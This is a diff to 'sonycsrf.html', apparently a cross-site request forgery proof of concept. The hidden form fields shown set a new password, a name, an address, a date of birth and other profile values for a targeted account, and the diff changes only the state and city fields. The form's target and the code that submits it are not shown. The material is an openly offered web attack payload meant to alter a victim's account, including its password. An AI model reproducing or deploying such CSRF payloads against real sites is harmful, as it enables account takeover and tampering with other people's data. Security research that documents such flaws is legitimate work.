--- a/sonycsrf.html
+++ b/sonycsrf.html
@@ -10,8 +10,8 @@
 		<input type="hidden" name="newcpassword" value="redassassin1337">
 		<input type="hidden" name="fname" value="RedAssassin">
 		<input type="hidden" name="address" value="50 samuel street">
-		<input type="hidden" name="state" value="Assam">
-		<input type="hidden" name="city" value="Odissa">
+		<input type="hidden" name="state" value="Maharashtra">
+		<input type="hidden" name="city" value="Mumbai">
 		<input type="hidden" name="pincode" value="400009">
 		<input type="hidden" name="dob" value="1997-08-03">
 		<input type="hidden" name="gender" value="Male">
